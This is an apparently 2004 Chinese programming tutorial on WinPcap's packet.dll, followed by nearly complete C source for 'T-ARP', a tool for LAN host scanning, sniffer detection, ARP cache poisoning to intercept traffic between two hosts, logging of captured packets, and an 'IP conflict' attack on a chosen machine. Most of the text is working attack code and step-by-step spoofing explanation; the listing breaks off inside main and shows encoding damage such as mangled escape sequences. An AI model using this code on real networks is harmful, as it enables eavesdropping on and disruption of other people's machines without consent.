详谈调用winpcap驱动写arp多功能工具

原创 2004年08月24日 14:31:00

详谈调用winpcap驱动写arp多功能工具

一 winpcap驱动简介
二 Packet.dll相关数据结构及函数
三 T-ARP功能及原理介绍
四 T-ARP主要代码分析
五 T-ARP源代码

一、winpcap驱动简介

winpcap(windows packet capture)是windows平台下一个免费,公共的网络访问系统。
(编者注:WinpCap开发包可以到以下两个网址下载: (1)http://winpcap.polito.it/ , (2)VC知识库工具栏目 )

开发winpcap这个项目的目的在于为win32应用程序提供访问网络底层的能力。它提供了以下的各项功能:
1> 捕获原始数据报,包括在共享网络上各主机发送/接收的以及相互之间交换的数据报;
2> 在数据报发往应用程序之前,按照自定义的规则将某些特殊的数据报过滤掉;
3> 在网络上发送原始的数据报;
4> 收集网络通信过程中的统计信息。

winpcap的主要功能在于独立于主机协议(如TCP-IP)而发送和接收原始数据报。也就是说,winpcap不能阻塞,过滤或控制其他应用程序数据报的发收,它仅仅只是监听共享网络上传送的数据报。因此,它不能用于QoS调度程序或个人防火墙。

目前,winpcap开发的主要对象是windows NT/2000/XP,这主要是因为在使用winpcap的用户中只有一小部分是仅使用windows 95/98/Me,并且M$也已经放弃了对win9x的开发。因此本文相关的程序T-ARP也是面向NT/2000/XP用户的。其实winpcap中的面向9x系统的概念和NT系统的非常相似,只是在某些实现上有点差异,比如说9x只支持ANSI编码,而NT系统则提倡使用Unicode编码。

本文讨论的是packet.dll所提供的各种函数,因为它们完全可以实现本文所希望的各项要求。但是如果你有其他特别的或更高级的要求,winpcap也提供了另一个动态连接库wpcap.dll。虽然wpcap.dll依靠于packet.dll,但是它却提供了一种更简单,直接,有力的方法来更好的利用编程环境。比如捕获一个数据报,创建一个数据报过滤装置或将监听到的数据报转存到某个文件等,wpcap.dll都会为你提供更加安全的实现方法。

二、Packet.dll相关数据结构及函数

本文的目的之一在于介绍如何利用winpcap驱动写ARP工具,因此有必要介绍一些相关的数据结构和函数,要不然看着一行行代码和函数,也许会有些不知所云。

首先介绍一些相关的数据结构:
1. typedef struct _ADAPTER ADAPTER //描述一个网络适配器;
2. typedef struct _PACKET PACKET //描述一组网络数据报的结构;
3. typedef struct NetType NetType //描述网络类型的数据结构;
4. typedef struct npf_if_addr npf_if_addr //描述一个网络适配器的ip地址;
5. struct bpf_hdr //数据报头部;
6. struct bpf_stat //当前捕获数据报的统计信息。

下面,将介绍T-ARP用到的各个函数,他们都是在packet.dll中定义的:
1> LPPACKET PacketAllocatePacket(void)
如果运行成功,返回一个_PACKET结构的指针,否则返回NULL。成功返回的结果将会传送到PacketReceivePacket()函数,接收来自驱动的网络数据报。

2> VOID PacketCloseAdapter(LPADAPTER lpAdapter)
关闭参数中提供的网络适配器,释放相关的ADAPTER结构。

3> VOID PacketFreePacket(LPPACKET lpPacket)
释放参数提供的_PACKET结构。

4> BOOLEAN PacketGetAdapterNames(LPSTR pStr,PULONG BufferSize)
返回可以得到的网络适配器列表及描述。

5> BOOLEAN PacketGetNetInfoEx(LPTSTR AdapterNames,npf_ip_addr *buff, PLONG NEntries)
返回某个网络适配器的全面地址信息。
其中npf_ip_addr结构包含:IPAddress,SubnetMask,Broadcast
IPAddress: ip地址
SubnetMask: 子网掩码
Broadcast: 广播地址

6> BOOLEAN PacketGetNetType(LPADAPTER AdapterObject, NetType *type)
返回某个网络适配器的MAC类型。
NetType结构里包含了LinkSpeed(速度)和LinkType(类型)。其中LinkType包含以下几种情况:
NdisMedium802_3: Ethernet(802.3)
NdisMediumWan: WAN
NdisMedium802_5: Token Ring(802.5)
NdisMediumFddi: FDDI
NdisMediumAtm: ATM
NdisMediumArcnet878_2: ARCNET(878.2)

7> BOOLEAN PacketGetStats(LPADAPTER AdapterObject,struct bpf_stat *s)
返回几个关于当前捕获报告的统计信息。
其中bpf_stat结构包含:bs_recv, bs_drop,ps_ifdrop,bs_capt
bs_recv: 从网络适配器开始捕获数据报开始所接收到的所有数据报的数目,包括丢失的数据报;
bs_drop: 丢失的数据报数目。在驱动缓冲区已经满时,就会发生数据报丢失的情况。

8> PCHAR PacketGetVersion()
返回关于dll的版本信息。

9> VOID PacketInitPacket(LPPACKET lpPacket, PVOID Buffer, UINT Length)
初始化一个_PACKET结构。

10> LPADAPTER PacketOpetAdapter(LPTSTR AdapterName)
打开一个网络适配器。

11> BOOLEAN PacketReceivePacket(LPADAPTER AdapterObject,LPPACKET lpPacket,BOOLEAN Sync)
从NPF驱动程序读取网络数据报及统计信息。
数据报编码结构: |bpf_hdr|data|Padding|bpf_hdr|data|Padding|

12> BOOLEAN PacketSendPacket(LPADAPTER AdapterObject,LPPACKET lpPacket, BOOLEAN Sync)
发送一个或多个数据报的副本。

13> BOOLEAN PacketSetBuff(LPADAPTER AdapterObject,int dim)
设置捕获数据报的内核级缓冲区大小。

14> BOOLEAN PacketSetHwFilter(LPADAPTER AdapterObject,ULONG Filter)
为接收到的数据报设置硬件过滤规则。
以下为一些典型的过滤规则:
NDIS_PACKET_TYPE_PROMISCUOUS: 设置为混杂模式,接收所有流过的数据报;
NDIS_PACKET_TYPE_DIRECTED: 只有目的地为本地主机网络适配器的数据报才会被接收;
NDIS_PACKET_TYPE_BROADCAST: 只有广播数据报才会被接收;
NDIS_PACKET_TYPE_MULTICAST: 只有与本地主机网络适配器相对应的多播数据报才会被接收;
NDIS_PACKET_TYPE_ALL_MULTICAST: 所有多播数据报均被接收;
NDIS_PACKET_TYPE_ALL_LOCAL: 所有本地数据报均被接收。

15> BOOLEAN PacketSetNumWrites(LPADAPTER AdapterObject,int nwrites)
设置调用PacketSendPacket()函数发送一个数据报副本所重复的次数。

16> BOOLEAN PacketSetReadTimeout(LPADAPTER AdapterObject,int timeout)
设置在接收到一个数据报后“休息”的时间。

以上就是T-ARP所调用的各个函数,它包含了packet.dll里的大部分函数。如果你想更深层的了解winpcap,请访问相关网站,主页地址: http://winpcap.polito.it

三、T-ARP功能及原理介绍

准备工作:
1. 安装winpcap驱动,目前最新的版本为winpcap_3.0_alpha, 稳定版本为winpcap_2.3;
2. 使用ARP欺骗功能前,必须启动ip路由功能,修改(添加)注册表选项:
     HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip/Parameters/IPEnableRouter = 0x1 

选项:
-m 主机扫描,获得局域网内指定ip段中存活主机的ip地址和mac地址;
-a 反嗅探扫描,获得局域网内指定ip段中嗅探主机的ip地址和mac地址;
-s ARP欺骗,欺骗局域网内指定的两台主机,使其相互发送接收的数据报均通过本地主机;
网络嗅探,如果你选择欺骗的两台主机均是本地主机,那么将会监听到所有流过本地主机的数据报;
IP冲突,如果你选择欺骗的两台主机是同一台非本地主机,那么就会发起ip冲突攻击;
-r 重置被欺骗主机,使被欺骗的两台主机恢复正常的工作状态。

原理及实现过程:
无论什么选项,第一件事就是获得本地主机的mac地址及相关网络设置。我们以一个特殊的ip地址(112.112.112.112)向本地主机发送一个ARP Request(ARP请求)数据报,当本地主机接收到后,就会发送一个ARP Reply(ARP应答)数据报来回应请求,这样我们就可以获得本地主机的mac地址了。至于相关的网络设置可以通过PacketGetNetInfoEx()和PacketGetNetType()获得。

-m 以本地主机的名义(本地主机的ip和mac)向指定ip网段内的所有主机发送广播(ff:ff:ff:ff:ff:ff)ARP Request数据报,存活的主机就会发送ARP Reply数据报,这样就可以获得当前存活主机的列表。因为在很多网关上都对ARP Request做了限制--非内网ip发送的ARP Request数据报不会得到网关的回应,如果你用内网的其他某台主机的ip来发送ARP Request数据报,如果填写的mac地址和相应的ip不合,就会出现ip冲突。所以最好还是用自己的ip和mac地址来发送请求。

-a 以本地主机的名义(本地主机的ip和mac)向指定ip网段内的所有主机发送31位伪广播地址(ff:ff:ff:ff:ff:fe)的ARP Request数据报,只有正在嗅探的主机才会发送ARP Reply数据报,这样就可以获得当前存活主机的列表。嗅探中的win2000系统还会对16位伪广播地址(ff:ff:00:00:00:00)做出回应;而嗅探中的win95/98/me不仅会回应16位伪广播地址,而且也会回应8位伪广播地址(ff:00:00:00:00:00),而*NIX系统对各种广播地址所做出的反应却有些不同。在此我们选择31位伪广播地址,是因为绝大多数的系统在嗅探时都会对它做出回应。而正常状况下的各种系统,都不会对31位伪广播地址做出回应。

-s (ARP欺骗spoof) 需要强调的是在某些局域网(如以太网)内,数据报的发送与接收是基于硬件地址的,这是我们实现欺骗的基础。首先获得指定的两台主机(假设为 A 和 B)的mac地址,然后向A发送ARP Reply数据报,其中的源ip地址为B的ip地址,但是源mac地址却是本地主机的mac地址,这样主机A就会认为主机B的mac地址是本地主机的mac地址,所以主机A发送到主机B的数据报都发送到本地主机了。同理向主机B发送ARP Reply数据报,通知它主机A的mac地址为本地主机的mac地址。这样主机A和主机B就会把目的主机的mac地址理解为本地主机的mac地址,于是他们之间相互发送的数据报都首先到达了本地主机,而先前我们已经将本地主机设置了ip路由功能,系统会自动将数据报转发到真正的目的主机。其间,你就可以监听它们通信的各种数据报了。

-s (网络嗅探sniff) 如果指定的两个目的主机均为本地主机,那么就只是将网络适配器设置为混杂模式,这样就可以监听到流过本地主机网络适配器的各种数据。

-s (ip冲突shock) 如果你选择欺骗的两台主机是同一台非本地主机(假如是主机C),那么就会不断地向主机C发送ARP Reply数据报,报文中的源ip地址就是主机C的ip地址,但是源mac地址却是本地主机的mac地址,因此主机C就会发现有另一台主机同时拥有和自己相同的ip,这就是ip冲突攻击。如果是非xp系统,都会跳出一个ip冲突的提示窗口,而xp系统也会有类似的警告。但是请注意,在主机C的系统事件查看器中,会留下本地主机的mac地址与之冲突的恶心记录,所以你最好不要滥用这个功能。

-r 在实现了ARP欺骗的情况下,向主机A和B发送ARP Reply数据报,通知主机A(B)注意主机B(A)的mac地址为主机B(A)自己的mac地址,这样主机A和B就会更新他们的ARP缓存,实现正常的数据通信。

四、T-ARP主要代码分析

1> 自定义函数:
int getmine() //发送ARP Request数据报,请求获得本地主机的mac地址;
void getdata(LPPACKET lp,int op) //分类处理接收到的数据报;
DWORD WINAPI sniff(LPVOID no) //将网络适配器设置为混杂模式,接收所有流过的数据报;
DWORD WINAPI sendMASR(LPVOID no) //发送ARP Request数据报,请求获得指定ip的mac地址;
DWORD WINAPI sendSR(LPVOID no) //发送ARP Reply进行ARP欺骗,或是更新主机的ARP缓存。

2> 主要代码分析
printf("/nLibarary Version: %s",PacketGetVersion()); //输出dll的版本信息;

PacketGetAdapterNames((char *)adaptername,&adapterlength) //获得本地主机的网络适配器列表和描述;

lpadapter=PacketOpenAdapter(adapterlist[open-1]); //打开指定的网络适配器;

PacketGetNetType(lpadapter,&ntype) //获得网络适配器的MAC类型;

PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen) //获得指定网络适配器的相关信息;

rthread=CreateThread(NULL,0,sniff,(LPVOID)&opti,0,&threadrid); //创建一个新线程来监听网络数据报;

PacketSetHwFilter(lpadapter,NDIS_PACKET_TYPE_PROMISCUOUS) //将网络适配器设置为混杂模式,这样才可以监听流过本地主机的数据报;
PacketSetBuff(lpadapter,500*1024) //自定义网络适配器的内核缓存的大小为 500*1024;

PacketSetReadTimeout(lpadapter,1) //设置接收一个数据报后等待的时间为1毫秒;

PacketReceivePacket(lpadapter,lppacketr,TRUE) //在设置为混杂模式后,接收所有的数据报;

sthread=CreateThread(NULL,0,sendMASR,(LPVOID)&opti,0,&threadsid);
sthread=CreateThread(NULL,0,sendSR,(LPVOID)&opti,0,&threadsid); //创建一个新线程发送特定的ARP数据报

PacketSetNumWrites(lpadapter,2) //在发送一个数据报时,重复发送两次;

PacketSendPacket(lpadapter,lppackets,TRUE) //发送自定义数据报;

WaitForSingleObject(sthread,INFINITE); //等待发送ARP数据报的线程结束;

PacketGetStats(lpadapter,&stat) //获得网络适配器的统计信息;

五、T-ARP源代码

#include "packet32.h"
#include "ntddndis.h"
#include <stdio.h>
#include <conio.h>

#pragma comment(lib,"ws2_32")
#pragma comment(lib,"packet")

#define ETH_IP       0x0800
#define ETH_ARP      0x0806
#define ARP_REQUEST  0x0001
#define ARP_REPLY    0x0002
#define ARP_HARDWARE 0x0001
#define max_num_adapter  10

#pragma pack(push,1)

typedef struct ethdr
{
	unsigned char   eh_dst[6];
	unsigned char   eh_src[6];
	unsigned short  eh_type;
}ETHDR,*PETHDR;

typedef struct arphdr
{
	unsigned short  arp_hdr;
	unsigned short  arp_pro;
	unsigned char   arp_hln;
	unsigned char   arp_pln;
	unsigned short  arp_opt;
	unsigned char   arp_sha[6];
	unsigned long   arp_spa;
	unsigned char   arp_tha[6];
	unsigned long   arp_tpa;
}ARPHDR,*PARPHDR;

typedef struct iphdr
{
	unsigned char  h_lenver;
	unsigned char  tos;
	unsigned short total_len;
	unsigned short ident;
	unsigned short frag_and_flags;
	unsigned char  ttl;
	unsigned char  proto;
	unsigned short checksum;
	unsigned int   sourceip;
	unsigned int   destip;
}IPHDR,*PIPHDR;

#pragma pack(push)

LPADAPTER lpadapter=0;
LPPACKET  lppacketr,lppackets;
ULONG     myip,firstip,secondip;
UCHAR     mmac[6]={0},fmac[6]={0},smac[6]={0};
BOOL      mm=FALSE,fm=FALSE,sm=FALSE; 
FILE      *fp; 
char      adapterlist[max_num_adapter][1024];
char      msg[50];
int       num=0;

void start()
{
	printf("T-ARP --- ARP Tools, by TOo2y(??), 11-9-2002/n");
	printf("Homepage: www.safechina.net/n");
	printf("E-mail: TOo2y@safechina.net/n");
	return ;
}

void usage()
{
	printf("/nUsage: T-ARP  [-m|-a|-s|-r]  firstip  secondip  /n/n");
	printf("Option:/n");
	printf("   -m  mac        Get the mac address from firstip to secondip/n");
	printf("   -a  antisniff  Get the sniffing host from firstip to secondip/n");
	printf("   -s  spoof      1> Spoof the host between firstip and secondip/n");
	printf("       sniff      2> Sniff if firstip == secondip == your own ip/n");
	printf("       shock      3> Shock if firstip == secondip != your own ip/n");
	printf("   -r  reset      Reset the spoofed host work normally/n/n");
	printf("Attention:/n");
	printf("    1> You must have installed the winpcap_2.3 or winpcap_3.0_alpha/n");
	printf("    2> HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//Tcpip//Parameters//IPEnableRouter == 0x1/n/n");
	return ;
}

int getmine()
{
	char   sendbuf[1024];
	int    k;
	ETHDR  eth;
	ARPHDR arp;

	for(k=0;k<6;k++)
	{
		eth.eh_dst[k]=0xff;
		eth.eh_src[k]=0x82;
		arp.arp_sha[k]=0x82;
		arp.arp_tha[k]=0x00;
	}
	eth.eh_type=htons(ETH_ARP);
	arp.arp_hdr=htons(ARP_HARDWARE);
	arp.arp_pro=htons(ETH_IP);
	arp.arp_hln=6;
	arp.arp_pln=4;
	arp.arp_opt=htons(ARP_REQUEST);
	arp.arp_tpa=htonl(myip);
	arp.arp_spa=inet_addr("112.112.112.112");

	memset(sendbuf,0,sizeof(sendbuf));
	memcpy(sendbuf,ð,sizeof(eth));
	memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));

	PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));
	if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)
	{
		printf("PacketSendPacket in getmine Error: %d/n",GetLastError());
		return -1;             
	}
	return 0;
}

void getdata(LPPACKET lp,int op) 
{
	ULONG  ulbytesreceived,off,tlen,ulen,ulLines;
	ULONG  j,k;
	ETHDR  *eth;
	ARPHDR *arp;
	PIPHDR ip;
	char   *buf,*pChar,*pLine,*base;
	struct bpf_hdr      *hdr;
	struct sockaddr_in  sin;

	ulbytesreceived=lp->ulBytesReceived;
	buf=(char *)lp->Buffer;

	off=0;
	while(off<ulbytesreceived)
	{
		if(kbhit())
		{
			return ;
		}
		hdr=(struct bpf_hdr *)(buf+off);
		off+=hdr->bh_hdrlen;

		pChar=(char *)(buf+off);
		base=pChar;
		off=Packet_WORDALIGN(off+hdr->bh_caplen);

		eth=(PETHDR)pChar;                
		arp=(PARPHDR)(pChar+sizeof(ETHDR)); 

		if(eth->eh_type==htons(ETH_IP)) 
		{
    		ip=(PIPHDR)(pChar+sizeof(ETHDR));

			if(fm && sm && (op==3))  
			{  
				if((((ip->sourceip!=htonl(myip)) && (ip->destip!=htonl(myip)) 
                            && !strcmp((char *)eth->eh_dst,(char *)mmac)) 
				&& ((ip->sourceip==htonl(firstip)) || (ip->destip==htonl(firstip)) 
				|| (ip->sourceip==htonl(secondip)) || (ip->destip==htonl(secondip))))
                           || ((firstip==myip) && (secondip==myip)))
				{
					memset(msg,0,sizeof(msg));

					sin.sin_addr.s_addr=ip->sourceip;				
					printf("[IP:]%16s ---> [IP:]",inet_ntoa(sin.sin_addr));

                                  strcpy(msg,inet_ntoa(sin.sin_addr));
					strcat(msg+15," ---> ");

					sin.sin_addr.s_addr=ip->destip;
					printf("%16s/n",inet_ntoa(sin.sin_addr));
                   
					strcat(msg+23,inet_ntoa(sin.sin_addr));
					fseek(fp,-2,1);
					fwrite("/r/n/r/n/r/n",6,1,fp);
					fwrite(msg,38,1,fp);
					fwrite("/r/n",2,1,fp);

					ulLines=(hdr->bh_caplen+15)/16;
					for(k=0;k<ulLines;k++)
					{
						pLine=pChar;
						printf("%08lx : ",pChar-base);

						ulen=tlen;
						ulen=(ulen>16) ? 16 : ulen;
						tlen-=ulen;

						for(j=0;j<ulen;j++)
							printf("%02x ",*(BYTE *)pChar++);

						if(ulen<16)
							printf("%*s",(16-ulen)*3," ");

						pChar=pLine;

						for(j=0;j<ulen;j++,pChar++)
						{
							printf("%c",isprint(*pChar)? *pChar : ''.'');
							fputc(isprint(*pChar) ? *pChar : ''.'',fp); 
						}
						printf("/n");
					}
					printf("/n");
                                  fwrite("/r/n",2,1,fp);  
				}

			}
			continue;
		}
	      else if((eth->eh_type==htons(ETH_ARP)) && (arp->arp_opt==htons(ARP_REPLY)))  
		{
    	       	sin.sin_addr.s_addr=arp->arp_spa;

     	          	if(sin.sin_addr.s_addr==htonl(myip)) 
			{
	            		memcpy(mmac,eth->eh_src,6);
	        	    	if(!mm)
	 			{
			    	printf("/t");    
	            	    	for(k=0;k<5;k++)
	    		    	printf("%.2x-",eth->eh_src[k]);
	          		printf("%.2x/n",eth->eh_src[5]);

                        	switch(op)
				{
                          	case 1:
                      	    	printf("/n[MAC LIST:]");
                           		break;
                           	case 2:
	                       	printf("/n[Sniffing Host:]");     
	                         	break;
                         	default:                    
	                         	break;
				}
			}
		    	mm=TRUE;
		}

    		if((op==1) || (op==2))
		{
		    	printf("/n[IP:] %.16s/t[MAC:] ",inet_ntoa(sin.sin_addr));
		    	for(k=0;k<5;k++)
			    	printf("%.2x-",eth->eh_src[k]);
		    	printf("%.2x",eth->eh_src[5]);

			}
	            	else if(((op==3) || (op==4)) && (!fm || !sm))
			{
	           		if(arp->arp_spa==htonl(firstip))
				{
	           		    	memcpy(fmac,eth->eh_src,6);
	            		    	fm=TRUE;
				}
			    
				if(arp->arp_spa==htonl(secondip))
				{
		          	    	memcpy(smac,eth->eh_src,6);
		         	    	sm=TRUE;
				}
			}
		}
	}
	return ;
}
			
DWORD WINAPI sniff(LPVOID no)
{
	int      option=*(int *)no;
	char     recvbuf[1024*250];

	if(PacketSetHwFilter(lpadapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
	{
		printf("Warning: Unable to set the adapter to promiscuous mode/n");
	}

	if(PacketSetBuff(lpadapter,500*1024)==FALSE)
	{
		printf("PacketSetBuff Error: %d/n",GetLastError());
		return -1;
	}

	if(PacketSetReadTimeout(lpadapter,1)==FALSE)
	{
		printf("Warning: Unable to set the timeout/n");
	}

	if((lppacketr=PacketAllocatePacket())==FALSE)
	{
		printf("PacketAllocatePacket receive Error: %d/n",GetLastError());
		return -1;
	}

	PacketInitPacket(lppacketr,(char *)recvbuf,sizeof(recvbuf));

	while(!kbhit())
	{
		if(PacketReceivePacket(lpadapter,lppacketr,TRUE)==FALSE)
		{
	           	return -1;
		}
		getdata(lppacketr,option);
	}
	return 0;
}

DWORD WINAPI sendMASR(LPVOID no)
{
	int    fun=*(int *)no;
	int    k,stimes;
       char   sendbuf[1024];
	ETHDR  eth;
	ARPHDR arp;
 
	if(fun<1 || fun>4)
	{
		return -1;
	}
	else
	{
		for(k=0;k<6;k++)
		{
			eth.eh_dst[k]=0xff;
			arp.arp_tha[k]=0x00;
		}
		if(fun==2)
			eth.eh_dst[5]=0xfe;
	}

	memcpy(eth.eh_src,mmac,6);
	eth.eh_type=htons(ETH_ARP);

	arp.arp_hdr=htons(ARP_HARDWARE);
	arp.arp_pro=htons(ETH_IP);
	arp.arp_hln=6;
	arp.arp_pln=4;
	arp.arp_opt=htons(ARP_REQUEST);
	arp.arp_spa=htonl(myip);
	memcpy(arp.arp_sha,mmac,6);

	if(fun==1 || fun==2)
		stimes=1;
	else if(fun==3 || fun==4)
		stimes=2;

	for(k=0;k<stimes;k++)
	{
		if(stimes==1)
		{
			arp.arp_tpa=htonl(firstip+(num++));
		}
		else if(stimes==2)
		{
			switch(k)
			{
			case 0:
				arp.arp_tpa=htonl(firstip);
				break;
			case 1:
				arp.arp_tpa=htonl(secondip);
				break;
			default:
				break;
			}
		}

		memset(sendbuf,0,sizeof(sendbuf));
		memcpy(sendbuf,ð,sizeof(eth));
		memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));

		PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));
		if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)
		{
			printf("PacketSendPacket in sendMASR Error: %d/n",GetLastError());
			return -1;
		}
	}
	return 0;
}
		
DWORD WINAPI sendSR(LPVOID no)
{
	int     fun=*(int *)no;
	int     j,k;
	char    sendbuf[1024];
	struct  sockaddr_in  fsin,ssin;
	BOOL    stimes=FALSE;
	ETHDR   eth;
	ARPHDR  arp;

	fsin.sin_addr.s_addr=htonl(firstip);
	ssin.sin_addr.s_addr=htonl(secondip);

	eth.eh_type=htons(ETH_ARP);
	arp.arp_hdr=htons(ARP_HARDWARE);
	arp.arp_pro=htons(ETH_IP);
	arp.arp_hln=6;
	arp.arp_pln=4;
   	arp.arp_opt=htons(ARP_REPLY);       

	if(fun==3)
	{
    	if(mm)
		{
			if((firstip==myip) && (secondip==myip))
			{
	            	    	fm=TRUE;
	          	    	sm=TRUE;

				memcpy(fmac,mmac,6);
				memcpy(smac,mmac,6);
			}
			else if(!fm || !sm)
			{
	            	    	printf("/nNot get enough data/n"); 
	       	    	return -1;
			}

			for(j=0;j<2;j++)
			{
				if(j==0)
				{
					printf("/nSpoofing %.16s :  ",inet_ntoa(fsin.sin_addr));
					printf("%.16s ==> ",inet_ntoa(ssin.sin_addr));
				}
				else if(j==1)
				{
					printf("Spoofing %.16s :  ",inet_ntoa(ssin.sin_addr));
					printf("%.16s ==> ",inet_ntoa(fsin.sin_addr));
				}
                           for(k=0;k<5;k++)
		        	    	printf("%.2x-",mmac[k]);
		           	printf("%.2x/n",mmac[5]);
			}
			printf("/ni will try to snoof .../n/n");
    	           	stimes=TRUE;
		}
		else 
		{
				printf("/nNot get enough data/n"); 
    			return -1;
		}
	}
	else if(fun==4)
	{
		if(mm) 
		{
			if((firstip==myip) && (secondip==myip))
			{
    	            		fm=TRUE;
    	            		sm=TRUE;

				memcpy(fmac,mmac,6);
				memcpy(smac,mmac,6);
			}
			else if(!fm || !sm)
			{
	         	    	printf("/nNot get enough data/n");
	          	    	return -1;
			}

			printf("/nReset %.16s :  ",inet_ntoa(fsin.sin_addr));
			printf("%.16s ==> ",inet_ntoa(ssin.sin_addr));

                    for(k=0;k<5;k++)
	          	    	printf("%.2x-",smac[k]);
	          	printf("%.2x/n",smac[5]);

			printf("Reset %.16s :  ",inet_ntoa(ssin.sin_addr));
			printf("%.16s ==> ",inet_ntoa(fsin.sin_addr));

                    for(k=0;k<5;k++)
	          	    	printf("%.2x-",fmac[k]);
	            	printf("%.2x/n/n",fmac[5]);

    	       	stimes=FALSE;
		}
		else 
		{
			printf("/nNot get enough data/n"); 
    			return -1;
		}
	}
	else
		return -1;

	do
	{
		memcpy(eth.eh_dst,fmac,6);
		memcpy(arp.arp_tha,fmac,6);
		arp.arp_tpa=htonl(firstip);
		arp.arp_spa=htonl(secondip);

		if(!stimes)
		{
			memcpy(eth.eh_src,smac,6);
			memcpy(arp.arp_sha,smac,6);
		}
		else
		{
			memcpy(eth.eh_src,mmac,6);
			memcpy(arp.arp_sha,mmac,6);
		}

		memset(sendbuf,0,sizeof(sendbuf));
		memcpy(sendbuf,ð,sizeof(eth));
		memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));

		PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));

           	if(PacketSetNumWrites(lpadapter,2)==FALSE)
		{
   			printf("Warning: Unable to send a packet 2 times/n");
		}

		if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)
		{
			printf("PacketSendPacket in SendSR Error: %d/n",GetLastError());
			return -1;
		}
		Sleep(1000);  

		memcpy(eth.eh_dst,smac,6);
		memcpy(arp.arp_tha,smac,6);
		arp.arp_tpa=htonl(secondip);
		arp.arp_spa=htonl(firstip);

		if(!stimes)
		{
			memcpy(eth.eh_src,fmac,6);
			memcpy(arp.arp_sha,fmac,6);
		}
              else	
		{
			memcpy(eth.eh_src,mmac,6);
			memcpy(arp.arp_sha,mmac,6);
		}


		memset(sendbuf,0,sizeof(sendbuf));
		memcpy(sendbuf,ð,sizeof(eth));
		memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));

		PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));
		if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)
		{
			printf("PacketSendPacket int sendSR Error: %d/n",GetLastError());
			return -1;
		}
		Sleep(1000);
	}while(stimes);

	if(fun==4)
		printf("Reset Successfully");

	return 0;
}

int main(int argc,char *argv[])
{
	HANDLE   sthread,rthread;
	WCHAR    adaptername[8192];
	WCHAR    *name1,*name2;
	ULONG    adapterlength;
	DWORD    threadsid,threadrid;
	struct   NetType      ntype;
	struct   bpf_stat     stat;
	struct   sockaddr_in  sin;
	struct   npf_if_addr  ipbuff;
	int      adapternum=0,opti=0,open,i,total;
	long     npflen;

	system("cls.exe");
	start();

	if(argc!=4)
	{
		usage();
		getche();
		return -1;
	}
	else
	{
		if(!strcmp(argv[1],"-m"))
		{
			opti=1;
		}
		else if(!strcmp(argv[1],"-a"))
		{
			opti=2;
		}
		else if(!strcmp(argv[1],"-s"))
		{
	 		opti=3;
 
               	if((fp=fopen("capture.txt","w+"))==NULL)
	        	{
	                  	printf("Open capture.txt Error: %d/n");
    	                    	return -1;
	       	}
    	              else
	       	{
                           fwrite("T-ARP Captrue Data",20,1,fp);
	       	}
	       }
		else if(!strcmp(argv[1],"-r"))
		{
			opti=4;
		}
		else
		{
			usage();
			getche();
			return -1;
		}
	}


	firstip=ntohl(inet_addr(argv[2]));
	secondip=ntohl(inet_addr(argv[3]));
	total=secondip-firstip+1;

	printf("/nLibarary Version: %s",PacketGetVersion());

	adapterlength=sizeof(adaptername);

	if(PacketGetAdapterNames((char *)adaptername,&adapterlength)==FALSE)
	{
		printf("PacketGetAdapterNames Error: %d/n",GetLastError());
		return -1;
	}
	
	name1=adaptername;
	name2=adaptername;
	i=0;

	while((*name1!=''/0'') || (*(name1-1)!=''/0''))
	{
		if(*name1==''/0'')
		{
			memcpy(adapterlist[i],name2,2*(name1-name2));
			name2=name1+1;
			i++;
		}
		name1++;
	}

	adapternum=i;
	printf("/nAdapters Installed:/n");
	for(i=0;i<adapternum;i++)
		wprintf(L"%d - %s/n",i+1,adapterlist[i]);

	do
	{
		printf("/nSelect the number of the adapter to open: ");
		scanf("%d",&open);
		if(open>=1 && open<=adapternum)
			break;         
	}while(open<1 || open>adapternum);

	lpadapter=PacketOpenAdapter(adapterlist[open-1]);

	if(!lpadapter || (lpadapter->hFile==INVALID_HANDLE_VALUE))
	{
		printf("PacketOpenAdapter Error: %d/n",GetLastError());
		return -1;
	}

	if(PacketGetNetType(lpadapter,&ntype))
	{
		printf("/n/t/t*** Host Information ***/n");
		printf("[LinkTpye:]/t%d/t/t",ntype.LinkType);    
		printf("[LinkSpeed:]/t%d b/s/n",ntype.LinkSpeed);
	}

	npflen=sizeof(ipbuff);  
	if(PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen))
	{
		sin=*(struct sockaddr_in *)&(ipbuff.Broadcast);
		printf("[Broadcast:]/t%.16s/t",inet_ntoa(sin.sin_addr));

		sin=*(struct sockaddr_in *)&(ipbuff.SubnetMask);
		printf("[SubnetMask:]/t%.16s/n",inet_ntoa(sin.sin_addr));

		sin=*(struct sockaddr_in *)&(ipbuff.IPAddress);
		printf("[IPAddress:]/t%.16s/t",inet_ntoa(sin.sin_addr));
		myip=ntohl(sin.sin_addr.s_addr);

		printf("[MACAddress:]");
	}
	else
	{
		printf("/nNot get enough data/n");
		PacketFreePacket(lppackets);
		PacketCloseAdapter(lpadapter);
		return -1;
	}

	if((lppackets=PacketAllocatePacket())==FALSE)
	{
		printf("PacketAllocatePacket send Error: %d/n",GetLastError());
		return -1;
	}

	rthread=CreateThread(NULL,0,sniff,(LPVOID)&opti,0,&threadrid);
	Sleep(300);

	if(getmine()) 
	{
    	PacketFreePacket(lppackets);
    	PacketFreePacket(lppacketr);

    	PacketCloseAdapter(lpadapter);
		return -1;
	}
	Sleep(300);

	if((opti==1) || (opti==2))
	{
		for(i=0;i<total;i++)
		{
			sthread=CreateThread(NULL,0,sendMASR,(LPVOID)&opti,0,&threadsid);
			Sleep(30);
		}
		Sleep(1000);
	}
	else if((opti==3) || (opti==4)) 
	{
		sthread=CreateThread(NULL,0,sendMASR,(LPVOID)&opti,0,&threadsid);
		Sleep(300);
		CloseHandle(sthread);

